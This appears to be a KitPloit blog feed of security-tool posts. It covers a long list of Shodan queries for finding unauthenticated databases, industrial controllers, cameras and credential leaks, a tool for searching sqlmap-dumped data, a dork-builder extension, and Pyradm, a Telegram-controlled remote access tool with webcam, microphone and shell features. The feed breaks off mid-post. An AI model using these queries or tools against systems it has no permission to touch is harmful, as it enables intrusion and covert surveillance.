tag:blogger.com,1999:blog-83172222311336605472024-03-19T02:21:46.575-03:00KitPloit - PenTest & Hacking ToolsKitPloit - leading source of Security Tools, Hacking Tools, CyberSecurity and Network Security ☣Unknownnoreply@blogger.comBlogger5852125tag:blogger.com,1999:blog-8317222231133660547.post-81316120703268537362024-03-18T08:30:00.000-03:002024-03-18T08:30:00.134-03:00Shodan Dorks<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaDAMAxzPS0-REZA9Ahea0PBQcJKUtiaLQ4Juak3swArhUZB8gRWjS9W0XFZe_g7QLwdooQBrdAspSvQ_RbE4h_FWhPPgYHH4GlIcnDFPPwY5sgSwmhF3UrfNkv4bIjgmTH7Nwe5OXZiOJ33hxoKI4vcFfn2go56GA9gRAcsDPRKD4vjw4J85Ozuh5KToM/s2174/shodan.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1238" data-original-width="2174" height="364" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaDAMAxzPS0-REZA9Ahea0PBQcJKUtiaLQ4Juak3swArhUZB8gRWjS9W0XFZe_g7QLwdooQBrdAspSvQ_RbE4h_FWhPPgYHH4GlIcnDFPPwY5sgSwmhF3UrfNkv4bIjgmTH7Nwe5OXZiOJ33hxoKI4vcFfn2go56GA9gRAcsDPRKD4vjw4J85Ozuh5KToM/w640-h364/shodan.png" width="640" /></a></div><p><br /></p><h3>Shodan Dorks by twitter.com/lothos612</h3> <p>Feel free to make suggestions</p><span><a name='more'></a></span><p><br /></p> <h1>Shodan Dorks</h1> <h1>Basic Shodan Filters</h1> <h3>city:</h3> <p>Find devices in a particular city. <code>city:"Bangalore"</code></p> <h3>country:</h3> <p>Find devices in a particular country. <code>country:"IN"</code></p> <h3>geo:</h3> <p>Find devices by giving geographical coordinates. <code>geo:"56.913055,118.250862"</code></p> <h3>Location</h3> <p><code>country:us</code> <code>country:ru country:de city:chicago</code></p> <h3>hostname:</h3> <p>Find devices matching the hostname. <code>server: "gws" hostname:"google"</code> <code>hostname:example.com -hostname:subdomain.example.com</code> <code>hostname:example.com,example.org</code></p> <h3>net:</h3> <p>Find devices based on an IP address or /x CIDR. <code>net:210.214.0.0/16</code></p> <h3>Organization</h3> <p><code>org:microsoft</code> <code>org:"United States Department"</code></p> <h3>Autonomous System Number (ASN)</h3> <p><code>asn:ASxxxx</code></p> <h3>os:</h3> <p>Find devices based on operating system. <code>os:"windows 7"</code></p> <h3>port:</h3> <p>Find devices based on open ports. <code>proftpd port:21</code></p> <h3>before/after:</h3> <p>Find devices before or after between a given time. <code>apache after:22/02/2009 before:14/3/2010</code></p> <h3>SSL/TLS Certificates</h3> <p>Self signed certificates <code>ssl.cert.issuer.cn:example.com ssl.cert.subject.cn:example.com</code></p> <p>Expired certificates <code>ssl.cert.expired:true</code></p> <p><code>ssl.cert.subject.cn:example.com</code></p> <h3>Device Type</h3> <p><code>device:firewall</code> <code>device:router</code> <code>device:wap</code> <code>device:webcam</code> <code>device:media</code> <code>device:"broadband router"</code> <code>device:pbx</code> <code>device:printer</code> <code>device:switch</code> <code>device:storage</code> <code>device:specialized</code> <code>device:phone</code> <code>device:"voip"</code> <code>device:"voip phone"</code> <code>device:"voip adaptor"</code> <code>device:"load balancer"</code> <code>device:"print server"</code> <code>device:terminal</code> <code>device:remote</code> <code>device:telecom</code> <code>device:power</code> <code>device:proxy</code> <code>device:pda</code> <code>device:bridge</code></p> <h3>Operating System</h3> <p><code>os:"windows 7"</code> <code>os:"windows server 2012"</code> <code>os:"linux 3.x"</code></p> <h3>Product</h3> <p><code>product:apache</code> <code>product:nginx</code> <code>product:android</code> <code>product:chromecast</code></p> <h3>Customer Premises Equipment (CPE)</h3> <p><code>cpe:apple</code> <code>cpe:microsoft</code> <code>cpe:nginx</code> <code>cpe:cisco</code></p> <h3>Server</h3> <p><code>server: nginx</code> <code>server: apache</code> <code>server: microsoft</code> <code>server: cisco-ios</code></p> <h3>ssh fingerprints</h3> <p><code>dc:14:de:8e:d7:c1:15:43:23:82:25:81:d2:59:e8:c0</code></p> <h1>Web</h1> <h3>Pulse Secure</h3> <p><code>http.html:/dana-na</code></p> <h3>PEM Certificates</h3> <p><code>http.title:"Index of /" http.html:".pem"</code></p> <h3>Tor / Dark Web sites</h3> <p><code>onion-location</code></p> <h1>Databases</h1> <h3>MySQL</h3> <p><code>"product:MySQL"</code> <code>mysql port:"3306"</code></p> <h3>MongoDB</h3> <p><code>"product:MongoDB"</code> <code>mongodb port:27017</code></p> <h3>Fully open MongoDBs</h3> <p><code>"MongoDB Server Information { "metrics":"</code> <code>"Set-Cookie: mongo-express=" "200 OK"</code> <code>"MongoDB Server Information" port:27017 -authentication</code></p> <h3>Kibana dashboards without authentication</h3> <p><code>kibana content-legth:217</code></p> <h3>elastic</h3> <p><code>port:9200 json</code> <code>port:"9200" all:elastic</code> <code>port:"9200" all:"elastic indices"</code></p> <h3>Memcached</h3> <p><code>"product:Memcached"</code></p> <h3>CouchDB</h3> <p><code>"product:CouchDB"</code> <code>port:"5984"+Server: "CouchDB/2.1.0"</code></p> <h3>PostgreSQL</h3> <p><code>"port:5432 PostgreSQL"</code></p> <h3>Riak</h3> <p><code>"port:8087 Riak"</code></p> <h3>Redis</h3> <p><code>"product:Redis"</code></p> <h3>Cassandra</h3> <p><code>"product:Cassandra"</code></p> <h1>Industrial Control Systems</h1> <h3>Samsung Electronic Billboards</h3> <p><code>"Server: Prismview Player"</code></p> <h3>Gas Station Pump Controllers</h3> <p><code>"in-tank inventory" port:10001</code></p> <h3>Fuel Pumps connected to internet:</h3> <p>No auth required to access CLI terminal. <code>"privileged command" GET</code></p> <h3>Automatic License Plate Readers</h3> <p><code>P372 "ANPR enabled"</code></p> <h3>Traffic Light Controllers / Red Light Cameras</h3> <p><code>mikrotik streetlight</code></p> <h3>Voting Machines in the United States</h3> <p>"voter system serial" country:US</p> <h3>Open ATM:</h3> <p>May allow for ATM Access availability <code>NCR Port:"161"</code></p> <h3>Telcos Running Cisco Lawful Intercept Wiretaps</h3> <p><code>"Cisco IOS" "ADVIPSERVICESK9_LI-M"</code></p> <h3>Prison Pay Phones</h3> <p><code>"[2J[H Encartele Confidential"</code></p> <h3>Tesla PowerPack Charging Status</h3> <p><code>http.title:"Tesla PowerPack System" http.component:"d3" -ga3ca4f2</code></p> <h3>Electric Vehicle Chargers</h3> <p><code>"Server: gSOAP/2.8" "Content-Length: 583"</code></p> <h3>Maritime Satellites</h3> <p>Shodan made a pretty sweet Ship Tracker that maps ship locations in real time, too!</p> <p><code>"Cobham SATCOM" OR ("Sailor" "VSAT")</code></p> <h3>Submarine Mission Control Dashboards</h3> <p><code>title:"Slocum Fleet Mission Control"</code></p> <h3>CAREL PlantVisor Refrigeration Units</h3> <p><code>"Server: CarelDataServer" "200 Document follows"</code></p> <h3>Nordex Wind Turbine Farms</h3> <p><code>http.title:"Nordex Control" "Windows 2000 5.0 x86" "Jetty/3.1 (JSP 1.1; Servlet 2.2; java 1.6.0_14)"</code></p> <h3>C4 Max Commercial Vehicle GPS Trackers</h3> <p><code>"[1m[35mWelcome on console"</code></p> <h3>DICOM Medical X-Ray Machines</h3> <p>Secured by default, thankfully, but these 1,700+ machines still have no business being on the internet.</p> <p><code>"DICOM Server Response" port:104</code></p> <h3>GaugeTech Electricity Meters</h3> <p><code>"Server: EIG Embedded Web Server" "200 Document follows"</code></p> <h3>Siemens Industrial Automation</h3> <p><code>"Siemens, SIMATIC" port:161</code></p> <h3>Siemens HVAC Controllers</h3> <p><code>"Server: Microsoft-WinCE" "Content-Length: 12581"</code></p> <h3>Door / Lock Access Controllers</h3> <p><code>"HID VertX" port:4070</code></p> <h3>Railroad Management</h3> <p><code>"log off" "select the appropriate"</code></p> <h3>Tesla Powerpack charging Status:</h3> <p>Helps to find the charging status of tesla powerpack. <code>http.title:"Tesla PowerPack System" http.component:"d3" -ga3ca4f2</code></p> <h3>XZERES Wind Turbine</h3> <p><code>title:"xzeres wind"</code></p> <h3>PIPS <a href="https://www.kitploit.com/search/label/Automated" target="_blank" title="Automated">Automated</a> License Plate Reader</h3> <p><code>"html:"PIPS Technology ALPR Processors""</code></p> <h3>Modbus</h3> <p><code>"port:502"</code></p> <h3>Niagara Fox</h3> <p><code>"port:1911,4911 product:Niagara"</code></p> <h3>GE-SRTP</h3> <p><code>"port:18245,18246 product:"general electric""</code></p> <h3>MELSEC-Q</h3> <p><code>"port:5006,5007 product:mitsubishi"</code></p> <h3>CODESYS</h3> <p><code>"port:2455 operating system"</code></p> <h3>S7</h3> <p><code>"port:102"</code></p> <h3>BACnet</h3> <p><code>"port:47808"</code></p> <h3>HART-IP</h3> <p><code>"port:5094 hart-ip"</code></p> <h3>Omron FINS</h3> <p><code>"port:9600 response code"</code></p> <h3>IEC 60870-5-104</h3> <p><code>"port:2404 asdu address"</code></p> <h3>DNP3</h3> <p><code>"port:20000 source address"</code></p> <h3>EtherNet/IP</h3> <p><code>"port:44818"</code></p> <h3>PCWorx</h3> <p><code>"port:1962 PLC"</code></p> <h3>Crimson v3.0</h3> <p><code>"port:789 product:"Red Lion Controls"</code></p> <h3>ProConOS</h3> <p><code>"port:20547 PLC"</code></p> <h1>Remote Desktop</h1> <h3>Unprotected VNC</h3> <p><code>"authentication disabled" port:5900,5901</code> <code>"authentication disabled" "RFB 003.008"</code></p> <h3>Windows RDP</h3> <p>99.99% are secured by a secondary Windows login screen.</p> <p><code>"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"</code></p> <h1>C2 Infrastructure</h1> <h3>CobaltStrike Servers</h3> <p><code>product:"cobalt strike team server"</code> <code>product:"Cobalt Strike Beacon"</code> <code>ssl.cert.serial:146473198</code> - default certificate serial number <code>ssl.jarm:07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1</code> <code>ssl:foren.zik</code></p> <h3>Brute Ratel</h3> <p><code>http.html_hash:-1957161625</code> <code>product:"Brute Ratel C4"</code></p> <h3>Covenant</h3> <p><code>ssl:"Covenant" http.component:"Blazor"</code></p> <h3>Metasploit</h3> <p><code>ssl:"MetasploitSelfSignedCA"</code></p> <h1>Network Infrastructure</h1> <h3>Hacked routers:</h3> <p>Routers which got compromised <code>hacked-router-help-sos</code></p> <h3>Redis open instances</h3> <p><code>product:"Redis key-value store"</code></p> <h3>Citrix:</h3> <p>Find Citrix Gateway. <code>title:"citrix gateway"</code></p> <h3>Weave Scope Dashboards</h3> <p>Command-line access inside <a href="https://www.kitploit.com/search/label/Kubernetes" target="_blank" title="Kubernetes">Kubernetes</a> pods and Docker containers, and real-time visualization/monitoring of the entire infrastructure.</p> <p><code>title:"Weave Scope" http.favicon.hash:567176827</code></p> <h3>Jenkins CI</h3> <p><code>"X-Jenkins" "Set-Cookie: JSESSIONID" http.title:"Dashboard"</code></p> <h3>Jenkins:</h3> <p>Jenkins Unrestricted Dashboard <code>x-jenkins 200</code></p> <h3>Docker APIs</h3> <p><code>"Docker Containers:" port:2375</code></p> <h3>Docker Private Registries</h3> <p><code>"Docker-Distribution-Api-Version: registry" "200 OK" -gitlab</code></p> <h3>Pi-hole Open DNS Servers</h3> <p><code>"dnsmasq-pi-hole" "Recursion: enabled"</code></p> <h3>DNS Servers with recursion</h3> <p><code>"port: 53" Recursion: Enabled</code></p> <h3>Already Logged-In as root via Telnet</h3> <p><code>"root@" port:23 -login -password -name -Session</code></p> <h3>Telnet Access:</h3> <p>NO password required for telnet access. <code>port:23 console gateway</code></p> <h3>Polycom video-conference system no-auth shell</h3> <p><code>"polycom command shell"</code></p> <h3>NPort serial-to-eth / MoCA devices without password</h3> <p><code>nport -keyin port:23</code></p> <h3>Android Root Bridges</h3> <p>A tangential result of Google's sloppy fractured update approach. 🙄 More information here.</p> <p><code>"Android Debug Bridge" "Device" port:5555</code></p> <h3>Lantronix Serial-to-Ethernet Adapter Leaking Telnet Passwords</h3> <p><code>Lantronix password port:30718 -secured</code></p> <h3>Citrix Virtual Apps</h3> <p><code>"Citrix Applications:" port:1604</code></p> <h3>Cisco Smart Install</h3> <p>Vulnerable (kind of "by design," but especially when exposed).</p> <p><code>"smart install client active"</code></p> <h3>PBX IP Phone Gateways</h3> <p><code>PBX "gateway console" -password port:23</code></p> <h3>Polycom Video Conferencing</h3> <p><code>http.title:"- Polycom" "Server: lighttpd"</code> <code>"Polycom Command Shell" -failed port:23</code></p> <h3>Telnet Configuration:</h3> <p><code>"Polycom Command Shell" -failed port:23</code></p> <p>Example: Polycom Video Conferencing</p> <h3>Bomgar Help Desk Portal</h3> <p><code>"Server: Bomgar" "200 OK"</code></p> <h3>Intel Active <a href="https://www.kitploit.com/search/label/Management" target="_blank" title="Management">Management</a> CVE-2017-5689</h3> <p><code>"Intel(R) Active Management Technology" port:623,664,16992,16993,16994,16995</code> <code>"Active Management Technology"</code></p> <h3>HP iLO 4 CVE-2017-12542</h3> <p><code>HP-ILO-4 !"HP-ILO-4/2.53" !"HP-ILO-4/2.54" !"HP-ILO-4/2.55" !"HP-ILO-4/2.60" !"HP-ILO-4/2.61" !"HP-ILO-4/2.62" !"HP-iLO-4/2.70" port:1900</code></p> <h3>Lantronix ethernet adapter's admin interface without password</h3> <p><code>"Press Enter for Setup Mode port:9999"</code></p> <h3>Wifi Passwords:</h3> <p>Helps to find the cleartext wifi passwords in Shodan. <code>html:"def_wirelesspassword"</code></p> <h3>Misconfigured Wordpress Sites:</h3> <p>The wp-config.php if accessed can give out the database credentials. <code>http.html:"* The wp-config.php creation script uses this file"</code></p> <h1>Outlook Web Access:</h1> <h3>Exchange 2007</h3> <p><code>"x-owa-version" "IE=EmulateIE7" "Server: Microsoft-IIS/7.0"</code></p> <h3>Exchange 2010</h3> <p><code>"x-owa-version" "IE=EmulateIE7" http.favicon.hash:442749392</code></p> <h3>Exchange 2013 / 2016</h3> <p><code>"X-AspNet-Version" http.title:"Outlook" -"x-owa-version"</code></p> <h3>Lync / Skype for Business</h3> <p><code>"X-MS-Server-Fqdn"</code></p> <h1>Network Attached Storage (NAS)</h1> <h3>SMB (Samba) File Shares</h3> <p>Produces ~500,000 results...narrow down by adding "Documents" or "Videos", etc.</p> <p><code>"Authentication: disabled" port:445</code></p> <h3>Specifically domain controllers:</h3> <p><code>"Authentication: disabled" NETLOGON SYSVOL -unix port:445</code></p> <h3>Concerning default network shares of QuickBooks files:</h3> <p><code>"Authentication: disabled" "Shared this folder to access QuickBooks files OverNetwork" -unix port:445</code></p> <h3>FTP Servers with <a href="https://www.kitploit.com/search/label/Anonymous" target="_blank" title="Anonymous">Anonymous</a> Login</h3> <p><code>"220" "230 Login successful." port:21</code></p> <h3>Iomega / LenovoEMC NAS Drives</h3> <p><code>"Set-Cookie: iomega=" -"manage/login.html" -http.title:"Log In"</code></p> <h3>Buffalo TeraStation NAS Drives</h3> <p><code>Redirecting sencha port:9000</code></p> <h3>Logitech Media Servers</h3> <p><code>"Server: Logitech Media Server" "200 OK"</code></p> <p>Example: Logitech Media Servers</p> <h3>Plex Media Servers</h3> <p><code>"X-Plex-Protocol" "200 OK" port:32400</code></p> <h3>Tautulli / PlexPy Dashboards</h3> <p><code>"CherryPy/5.1.0" "/home"</code></p> <h3>Home router attached USB</h3> <p><code>"IPC$ all storage devices"</code></p> <h1>Webcams</h1> <h3>Generic camera search</h3> <p><code>title:camera</code></p> <h3>Webcams with screenshots</h3> <p><code>webcam has_screenshot:true</code></p> <h3>D-Link webcams</h3> <p><code>"d-Link Internet Camera, 200 OK"</code></p> <h3>Hipcam</h3> <p><code>"Hipcam RealServer/V1.0"</code></p> <h3>Yawcams</h3> <p><code>"Server: yawcam" "Mime-Type: text/html"</code></p> <h3>webcamXP/webcam7</h3> <p><code>("webcam 7" OR "webcamXP") http.component:"mootools" -401</code></p> <h3>Android IP Webcam Server</h3> <p><code>"Server: IP Webcam Server" "200 OK"</code></p> <h3>Security DVRs</h3> <p><code>html:"DVR_H264 ActiveX"</code></p> <h3>Surveillance Cams:</h3> <p>With username:admin and password: :P <code>NETSurveillance uc-httpd</code> <code>Server: uc-httpd 1.0.0</code></p> <h1>Printers & Copiers:</h1> <h3>HP Printers</h3> <p><code>"Serial Number:" "Built:" "Server: HP HTTP"</code></p> <h3>Xerox Copiers/Printers</h3> <p><code>ssl:"Xerox Generic Root"</code></p> <h3>Epson Printers</h3> <p><code>"SERVER: EPSON_Linux UPnP" "200 OK"</code></p> <p><code>"Server: EPSON-HTTP" "200 OK"</code></p> <h3>Canon Printers</h3> <p><code>"Server: KS_HTTP" "200 OK"</code></p> <p><code>"Server: CANON HTTP Server"</code></p> <h1>Home Devices</h1> <h3>Yamaha Stereos</h3> <p><code>"Server: AV_Receiver" "HTTP/1.1 406"</code></p> <h3>Apple AirPlay Receivers</h3> <p>Apple TVs, HomePods, etc.</p> <p><code>"\x08_airplay" port:5353</code></p> <h3>Chromecasts / Smart TVs</h3> <p><code>"Chromecast:" port:8008</code></p> <h3>Crestron Smart Home Controllers</h3> <p><code>"Model: PYNG-HUB"</code></p> <h1>Random Stuff</h1> <h3>Calibre libraries</h3> <p><code>"Server: calibre" http.status:200 http.title:calibre</code></p> <h3>OctoPrint 3D Printer Controllers</h3> <p><code>title:"OctoPrint" -title:"Login" http.favicon.hash:1307375944</code></p> <h3>Etherium Miners</h3> <p><code>"ETH - Total speed"</code></p> <h3>Apache <a href="https://www.kitploit.com/search/label/Directory" target="_blank" title="Directory">Directory</a> Listings</h3> <p>Substitute .pem with any extension or a filename like phpinfo.php.</p> <p><code>http.title:"Index of /" http.html:".pem"</code></p> <h3>Misconfigured WordPress</h3> <p>Exposed wp-config.php files containing database credentials.</p> <p><code>http.html:"* The wp-config.php creation script uses this file"</code></p> <h3>Too Many Minecraft Servers</h3> <p><code>"Minecraft Server" "protocol 340" port:25565</code></p> <h3>Literally Everything in North Korea</h3> <p><code>net:175.45.176.0/22,210.52.109.0/24,77.94.35.0/24</code></p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/lothos612/shodan" rel="nofollow" target="_blank" title="Download Shodan">Download Shodan</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-28563560138004185342024-03-17T08:30:00.005-03:002024-03-17T08:30:00.135-03:00mapXplore - Allow Exporting The Information Downloaded With Sqlmap To A Relational Database Like Postgres And Sqlite<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjlrftihbe7OgMomclxIALSUrUDN920y-paMuJJOAanakFuwi12o2L3cZbDwEuiueW5FYSsdK-mBAGvLGlSfO_iWHVXnW3-qX4K-rexh_iwFBvowjdvRfVWXwAN8uDniXpk4MkXc-LZ_yQphZ9yLRGdz9CwDXZzKfB14YJk3tNfMFggY8SVdHOjWnj2YTXu"><img alt="" border="0" height="640" id="BLOGGER_PHOTO_ID_7345629037921874834" src="https://blogger.googleusercontent.com/img/a/AVvXsEjlrftihbe7OgMomclxIALSUrUDN920y-paMuJJOAanakFuwi12o2L3cZbDwEuiueW5FYSsdK-mBAGvLGlSfO_iWHVXnW3-qX4K-rexh_iwFBvowjdvRfVWXwAN8uDniXpk4MkXc-LZ_yQphZ9yLRGdz9CwDXZzKfB14YJk3tNfMFggY8SVdHOjWnj2YTXu=w640-h640" width="640" /></a></p> <p><strong><br /></strong></p><p><strong>mapXplore</strong> is a modular application that imports data extracted of the <a href="https://www.kitploit.com/search/label/SQLMap" target="_blank" title="sqlmap">sqlmap</a> to <a href="https://www.kitploit.com/search/label/PostgreSQL" target="_blank" title="PostgreSQL">PostgreSQL</a> or <a href="https://www.kitploit.com/search/label/SQLite" target="_blank" title="SQLite">SQLite</a> database.</p> <p>Its main features are:</p> <ul> <li>Import of information extracted from sqlmap to PostgreSQL or SQLite for subsequent querying.</li> <li>Sanitized information, which means that at the time of import, it decodes or transforms unreadable information into readable information.</li> <li>Search for information in all tables, such as passwords, users, and desired information.</li> <li> <p>Automatic export of information stored in <strong>base64</strong>, such as:</p> <ul> <li>Word, Excel, PowerPoint files</li> <li>.zip files</li> <li>Text files or plain text information</li> <li>Images</li> </ul> </li> <li> <p>Filter tables and columns by criteria.</p> </li> <li>Filter by different types of hash functions without requiring prior conversion.</li> <li>Export relevant information to Excel or HTML</li></ul><span><a name='more'></a></span><div><br /></div> <h1>Installation</h1> <h2>Requirements</h2> <ul> <li>python-3.11</li> </ul> <pre><code>git clone https://github.com/daniel2005d/mapXplore<br />cd mapXplore<br />pip install -r requirements<br /></code></pre> <h1>Usage</h1> <p>It is a modular application, and consists of the following:</p> <ul> <li><strong>config</strong>: It is responsible for configuration, such as the database <a href="https://www.kitploit.com/search/label/Engine" target="_blank" title="engine">engine</a> to use, import paths, among others.</li> <li><strong>import</strong>: It is responsible for importing and processing the information extracted from <strong>sqlmap</strong>.</li> <li><strong>query</strong>: It is the main module capable of filtering and extracting the required information.<ul> <li>Filter by tables</li> <li>Filter by columns</li> <li>Filter by one or more words</li> <li>Filter by one or more hash functions within which are:<ul> <li>MD5</li> <li>SHA1</li> <li>SHA256</li> <li>SHA3</li> <li>....</li> </ul> </li> </ul> </li> </ul> <h3>Beginning</h3> <blockquote> <p>Allows loading a default configuration at the start of the program</p> </blockquote> <pre><code>python engine.py [--config config.json]<br /></code></pre> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiM5A4KL84WLLi1JQXHtsu1wcbD9F_xs9sDEDxrrWLMPSVINZOcjaUHPCyPwnUsK1M6AFds1NKfDdANmOLaTN-BQTsT_E5Sk1Mc03V4AgEIW7El5bpKultZ6tgW_siuaU5uNatA_Ocm45HZuoa8vgNVltmk6GNEghCEFX_n1RagyRsiojEbse2cSdMDLq_s"><img alt="" border="0" height="292" id="BLOGGER_PHOTO_ID_7345629069448547762" src="https://blogger.googleusercontent.com/img/a/AVvXsEiM5A4KL84WLLi1JQXHtsu1wcbD9F_xs9sDEDxrrWLMPSVINZOcjaUHPCyPwnUsK1M6AFds1NKfDdANmOLaTN-BQTsT_E5Sk1Mc03V4AgEIW7El5bpKultZ6tgW_siuaU5uNatA_Ocm45HZuoa8vgNVltmk6GNEghCEFX_n1RagyRsiojEbse2cSdMDLq_s=w640-h292" width="640" /></a></p> <h2>Modules</h2> <ul> <li><a href="https://github.com/daniel2005d/doc/en/configuration.md" rel="nofollow" target="_blank" title="config">config</a></li> <li><a href="https://github.com/daniel2005d/doc/en/import.md" rel="nofollow" target="_blank" title="import">import</a></li> <li><a href="https://github.com/daniel2005d/doc/en/main.md" rel="nofollow" target="_blank" title="principal|search">principal|search</a></li> </ul><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/daniel2005d/mapXplore" rel="nofollow" target="_blank" title="Download mapXplore">Download mapXplore</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-30578830815800991132024-03-16T08:30:00.007-03:002024-03-16T08:30:00.240-03:00Dorkish - Chrome Extension Tool For OSINT & Recon<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhCuXhuOHAwF4F1MshOh04-7r3WLJ8-HkqER3KtkHHmm5XrwJlS2oWMuUWNAfuL-WZ0H7Vmry4rHhUIIRS4kzpV9g8dwT8FTW-M0fGI0Fzfh9-8s_OOBhIYbp-w8hJQwl6T_O9LeMfFe8UvYedLCVHpYqmbkuuZCW1n5-BYK0E3Da2IO0UmmP6djGpVS4U"><img alt="" border="0" height="640" id="BLOGGER_PHOTO_ID_7345707297268900690" src="https://blogger.googleusercontent.com/img/a/AVvXsEhCuXhuOHAwF4F1MshOh04-7r3WLJ8-HkqER3KtkHHmm5XrwJlS2oWMuUWNAfuL-WZ0H7Vmry4rHhUIIRS4kzpV9g8dwT8FTW-M0fGI0Fzfh9-8s_OOBhIYbp-w8hJQwl6T_O9LeMfFe8UvYedLCVHpYqmbkuuZCW1n5-BYK0E3Da2IO0UmmP6djGpVS4U=w542-h640" width="542" /></a></p><br /> <p>During <a href="https://www.kitploit.com/search/label/Reconaissance" target="_blank" title="reconaissance">reconaissance</a> phase or when doing OSINT , we often use google dorking and shodan and thus the idea of Dorkish. <br /> Dorkish is a Chrome extension tool that facilitates custom dork creation for Google and Shodan using the builder and it offers prebuilt dorks for efficient <a href="https://www.kitploit.com/search/label/Reconnaissance" target="_blank" title="reconnaissance">reconnaissance</a> and OSINT engagement.</p><span><a name='more'></a></span><p><br /></p> <h1>Installation And Setup</h1> <p>1- Clone the repository </p> <pre><code>git clone https://github.com/yousseflahouifi/dorkish.git<br /></code></pre> <p>2- Go to chrome://extensions/ and enable the Developer mode in the top right corner.<br /> 3- click on Load unpacked extension button and select the dorkish folder.</p> <p><strong>Note:</strong> For firefox users , you can find the extension here : https://addons.mozilla.org/en-US/firefox/addon/dorkish/</p> <h1>Features</h1> <h2>Google dorking</h2> <ul> <li>Builder with keywords to filter your google search results.</li> <li>Prebuilt dorks for Bug bounty programs.</li> <li>Prebuilt dorks used during the reconnaissance phase in bug bounty.</li> <li>Prebuilt dorks for exposed files and directories</li> <li>Prebuilt dorks for logins and sign up portals</li> <li>Prebuilt dorks for cyber secruity jobs</li> </ul> <h2>Shodan dorking</h2> <ul> <li>Builder with filter keywords used in shodan.</li> <li>Varierty of prebuilt dorks to find IOT , Network <a href="https://www.kitploit.com/search/label/Infrastructure" target="_blank" title="infrastructure">infrastructure</a> , <a href="https://www.kitploit.com/search/label/Cameras" target="_blank" title="cameras">cameras</a> , ICS , databases , etc.</li> </ul> <h1>Usage</h1> <p>Once you have found or built the dork you need, simply click it and click search. This will direct you to the desired search engine, Shodan or Google, with the specific dork you've entered. Then, you can explore and enjoy the results that match your query.</p> <h1>TODO</h1> <ul> <li>Add more useful dorks and catogories</li> <li>Fix some bugs</li> <li>Add a search bar to search through the results</li> <li>Might add some LLM models to build dorks</li></ul> <h1>Notes</h1> <p>I have built some dorks and I have used some public resources to gather the dorks , here's few : - https://github.com/lothos612/shodan - https://github.com/TakSec/google-dorks-bug-bounty</p> <h1>Warning</h1> <ul> <li>I am not responsible for any damage caused by using the tool</li> </ul><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/yousseflahouifi/dorkish" rel="nofollow" target="_blank" title="Download Dorkish">Download Dorkish</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-24110378230006001572024-03-15T08:30:00.019-03:002024-03-15T08:30:00.251-03:00Pyradm - Python Remote Administration Tool Via Telegram<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgJPTq8xInSdKBSa6BpVZrGhvdkXRJH1rb7CetGHsi4B3F7pl33CFHbd7alSnVcmhZWg7jQjc2sNggHFP6AqZxgpBfHfTBczqCUw7qHvAv8t8ky7qRpD5m4drv7EvVcDNcYraQWrWCGynX7eotRtmEXwIaIjQsfkZILhteFJ2b_Nk3lZUThfxrzG4HYUw8" style="text-align: left;"><img alt="" border="0" height="380" id="BLOGGER_PHOTO_ID_7345705617714872402" src="https://blogger.googleusercontent.com/img/a/AVvXsEgJPTq8xInSdKBSa6BpVZrGhvdkXRJH1rb7CetGHsi4B3F7pl33CFHbd7alSnVcmhZWg7jQjc2sNggHFP6AqZxgpBfHfTBczqCUw7qHvAv8t8ky7qRpD5m4drv7EvVcDNcYraQWrWCGynX7eotRtmEXwIaIjQsfkZILhteFJ2b_Nk3lZUThfxrzG4HYUw8=w640-h380" width="640" /></a></p><p><br /></p> <blockquote> <p>Remote administration crossplatfrom tool via telegram\ Coded with ❤️ <strong>python3</strong> + <strong>aiogram3</strong>\ https://t.me/pt_soft</p> </blockquote> <h2>v0.3</h2> <ul> <li>[X] <a href="https://www.kitploit.com/search/label/Screenshot" target="_blank" title="Screenshot">Screenshot</a> from target</li> <li>[X] Crossplatform</li> <li>[X] Upload/Download</li> <li>[X] Fully compatible shell</li> <li>[X] Process list</li> <li>[X] <a href="https://www.kitploit.com/search/label/Webcam" target="_blank" title="Webcam">Webcam</a> (video record or screenshot)</li> <li>[X] Geolocation</li> <li>[X] Filemanager</li> <li>[X] Microphone</li> <li>[X] Clipboard (text, image)</li> </ul><span><a name='more'></a></span><div><br /></div> <h2>Functional</h2> <pre><code>/start - start pyradm<br />/help - help<br />/shell - shell commands<br />/sc - screenshot<br />/download - download (abs. path)<br />/info - system info<br />/ip - public ip address and geolocation<br />/ps - process list<br />/webcam 5 - record video (secs)<br />/webcam - screenshot from camera<br />/fm - filemanager<br />/fm /home or /fm C:\<br />/mic 10 - <a href="https://www.kitploit.com/search/label/Record%20Audio" target="_blank" title="record audio">record audio</a> from mic<br />/clip - get clipboard data<br />Press button to download file<br />Send any file as file for upload to target<br /></code></pre> <h2>Install</h2> <ul> <li><code>git clone https://github.com/akhomlyuk/pyradm.git</code></li> <li><code>cd pyradm</code></li> <li><code>pip3 install -r requirements.txt</code></li> <li><code>Put bot <a href="https://www.kitploit.com/search/label/Token" target="_blank" title="token">token</a> to cfg.py, ask @Bothfather</code></li> <li><code>python3 main.py</code></li> </ul> <h2>Compile</h2> <ul> <li><code>Put bot token to cfg.py</code></li> <li><code>pip install nuitka</code></li> <li><code>nuitka --mingw64 --onefile --follow-imports --remove-output -o pyradm.exe main.py</code></li> </ul> <h2>Screens</h2> <p style="text-align: center;"><a 